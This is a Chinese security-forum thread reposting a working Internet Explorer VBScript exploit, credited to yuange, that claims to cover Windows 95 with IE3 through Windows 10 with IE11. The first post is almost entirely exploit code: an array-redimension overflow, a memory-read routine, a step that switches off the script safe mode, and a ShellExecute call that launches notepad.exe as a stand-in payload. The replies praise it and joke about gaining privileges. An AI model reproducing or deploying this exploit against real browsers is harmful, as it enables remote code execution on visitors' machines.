查看: 20900|回复: 11

win95+ie3-win10+ie11 浏览器执行漏洞

[复制链接]
  • TA的每日心情
    慵懒
    2022-4-16 15:45
  • 签到天数: 247 天

    [LV.8]以坛为家I

    发表于 2014-11-13 10:06:53 | 显示全部楼层 |阅读模式

    转自:http://hi.baidu.com/yuange1975

    最新ie下测试成功。

    测试图为实际测试

    QQ图片20141113100753.jpg

    [AppleScript] 纯文本查看 复制代码
    //*
    
       allie(win95+ie3-win10+ie11) dve copy by yuange in 2009.
    
       [url]http://twitter.com/yuange75[/url]
    
       [url]http://hi.baidu.com/yuange1975[/url]
    
      
    
    *//
    
    
    
    
    <!doctype html>
    
    <html>
    
    <meta http-equiv="X-UA-Compatible" content="IE=EmulateIE8" >
    
    <head>
    
    </head>
    
    <body>
    
    
    
    
    <SCRIPT LANGUAGE="VBScript">
    
    
    
    
    function runmumaa() 
    
    On Error Resume Next
    
    set shell=createobject("Shell.Application")
    
    shell.ShellExecute "notepad.exe"
    
    end function
    
    
    
    
    </script>
    
    
    
    
    <SCRIPT LANGUAGE="VBScript">
    
     
    
    dim   aa()
    
    dim   ab()
    
    dim   a0
    
    dim   a1
    
    dim   a2
    
    dim   a3
    
    dim   win9x
    
    dim   intVersion
    
    dim   rnda
    
    dim   funclass
    
    dim   myarray
    
    
    
    
    Begin()
    
    
    
    
    function Begin()
    
      On Error Resume Next
    
      info=Navigator.UserAgent
    
    
    
    
      if(instr(info,"Win64")>0)   then
    
         exit   function
    
      end if
    
    
    
    
      if (instr(info,"MSIE")>0)   then 
    
                 intVersion = CInt(Mid(info, InStr(info, "MSIE") + 5, 2))   
    
      else
    
         exit   function  
    
                 
    
      end if
    
    
    
    
      win9x=0
    
    
    
    
      BeginInit()
    
      If Create()=True Then
    
         myarray=        chrw(01)&chrw(2176)&chrw(01)&chrw(00)&chrw(00)&chrw(00)&chrw(00)&chrw(00)
    
         myarray=myarray&chrw(00)&chrw(32767)&chrw(00)&chrw(0)
    
    
    
    
         if(intVersion<4) then
    
             document.write("<br> IE")
    
             document.write(intVersion)
    
             runshellcode()                    
    
         else  
    
              setnotsafemode()
    
         end if
    
      end if
    
    end function
    
    
    
    
    function BeginInit()
    
       Randomize()
    
       redim aa(5)
    
       redim ab(5)
    
       a0=13+17*rnd(6)
    
       a3=7+3*rnd(5)
    
    end function
    
    
    
    
    function Create()
    
      On Error Resume Next
    
      dim i
    
      Create=False
    
      For i = 0 To 400
    
        If Over()=True Then
    
        '   document.write(i)     
    
           Create=True
    
           Exit For
    
        End If 
    
      Next
    
    end function
    
    
    
    
    sub testaa()
    
    end sub
    
    
    
    
    function mydata()
    
        On Error Resume Next
    
         i=testaa
    
         i=null
    
         redim  Preserve aa(a2)  
    
      
    
         ab(0)=0
    
         aa(a1)=i
    
         ab(0)=6.36598737437801E-314
    
    
    
    
         aa(a1+2)=myarray
    
         ab(2)=1.74088534731324E-310  
    
         mydata=aa(a1)
    
    
         redim  Preserve aa(a0)  
    
    end function 
    
    
    
    
    
    
    
    function setnotsafemode()
    
        On Error Resume Next
    
        i=mydata()  
    
        i=readmemo(i+8)
    
        i=readmemo(i+16)
    
        j=readmemo(i+&h134)  
    
        for k=0 to &h60 step 4
    
            j=readmemo(i+&h120+k)
    
            if(j=14) then
    
                  j=0          
    
                  redim  Preserve aa(a2)             
    
         aa(a1+2)(i+&h11c+k)=ab(4)
    
                  redim  Preserve aa(a0)  
    
    
    
    
         j=0 
    
                  j=readmemo(i+&h120+k)   
    
             
    
                   Exit for
    
               end if
    
    
    
    
        next 
    
        ab(2)=1.69759663316747E-313
    
        runmumaa() 
    
    end function
    
    
    
    
    function Over()
    
        On Error Resume Next
    
        dim type1,type2,type3
    
        Over=False
    
        a0=a0+a3
    
        a1=a0+2
    
        a2=a0+&h8000000
    
      
    
        redim  Preserve aa(a0) 
    
        redim   ab(a0)     
    
      
    
        redim  Preserve aa(a2)
    
      
    
        type1=1
    
        ab(0)=1.123456789012345678901234567890
    
        aa(a0)=10
    
              
    
        If(IsObject(aa(a1-1)) = False) Then
    
           if(intVersion<4) then
    
               mem=cint(a0+1)*16             
    
               j=vartype(aa(a1-1))
    
               if((j=mem+4) or (j*8=mem+8)) then
    
                  if(vartype(aa(a1-1))<>0)  Then    
    
                     If(IsObject(aa(a1)) = False ) Then             
    
                       type1=VarType(aa(a1))
    
                     end if               
    
                  end if
    
               else
    
                 redim  Preserve aa(a0)
    
                 exit  function
    
    
    
    
               end if 
    
            else
    
               if(vartype(aa(a1-1))<>0)  Then    
    
                  If(IsObject(aa(a1)) = False ) Then
    
                      type1=VarType(aa(a1))
    
                  end if               
    
                end if
    
            end if
    
        end if
    
                  
    
        
    
        If(type1=&h2f66) Then         
    
              Over=True      
    
        End If  
    
        If(type1=&hB9AD) Then
    
              Over=True
    
              win9x=1
    
        End If  
    
    
    
    
        redim  Preserve aa(a0)          
    
            
    
    end function
    
    
    
    
    function ReadMemo(add) 
    
        On Error Resume Next
    
        redim  Preserve aa(a2)  
    
      
    
        ab(0)=0   
    
        aa(a1)=add+4     
    
        ab(0)=1.69759663316747E-313       
    
        ReadMemo=lenb(aa(a1))  
    
       
    
        ab(0)=0    
    
     
    
        redim  Preserve aa(a0)
    
    end function
    
    
    
    
    </script>
    
    
    
    
    </body>
    
    </html>
    回复

    使用道具 举报

  • TA的每日心情
    开心
    2016-8-27 01:19
  • 签到天数: 50 天

    [LV.5]常住居民I

    发表于 2014-11-13 10:39:13 | 显示全部楼层
    win10 不能拨号  忧桑
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-13 11:46:12 | 显示全部楼层
    哎呀,好屌!
    回复 支持 反对

    使用道具 举报

    该用户从未签到

    发表于 2014-11-13 16:40:55 | 显示全部楼层
    啪的一下添加账户了
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    无聊
    2017-7-17 14:40
  • 签到天数: 62 天

    [LV.6]常住居民II

    发表于 2014-11-13 18:33:00 | 显示全部楼层
    啪的一下,我的权限
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-8-10 19:40
  • 签到天数: 33 天

    [LV.5]常住居民I

    发表于 2014-11-14 13:25:25 | 显示全部楼层

    啪的一下,我的权限
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2021-9-9 23:35
  • 签到天数: 1 天

    [LV.1]初来乍到

    发表于 2014-11-14 22:05:58 | 显示全部楼层
    啪的一下,我的权限
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    慵懒
    2017-1-15 18:41
  • 签到天数: 412 天

    [LV.9]以坛为家II

    发表于 2014-11-14 23:30:15 | 显示全部楼层
    啪的一下,我的权限
    回复 支持 反对

    使用道具 举报

  • TA的每日心情

    2019-6-3 21:25
  • 签到天数: 116 天

    [LV.6]常住居民II

    发表于 2014-11-14 23:52:57 | 显示全部楼层
    没什么要
    函数
    回复 支持 反对

    使用道具 举报

  • TA的每日心情
    擦汗
    2016-4-26 16:21
  • 签到天数: 11 天

    [LV.3]偶尔看看II

    发表于 2014-11-14 23:59:31 | 显示全部楼层
    这个有点  6666
    回复 支持 反对

    使用道具 举报

    您需要登录后才可以回帖 登录 | 注册

    本版积分规则

    指导单位

    江苏省公安厅

    江苏省通信管理局

    浙江省台州刑侦支队

    DEFCON GROUP 86025

    旗下站点

    邮箱系统

    应急响应中心

    红盟安全

    联系我们

    官方QQ群:112851260

    官方邮箱:security#ihonker.org(#改成@)

    官方核心成员

    Archiver|手机版|小黑屋| ( 苏ICP备2021031567号 )

    GMT+8, 2024-11-25 12:20 , Processed in 0.046002 second(s), 15 queries , Gzip On, MemCache On.

    Powered by ihonker.com

    Copyright © 2015-现在.

  • 返回顶部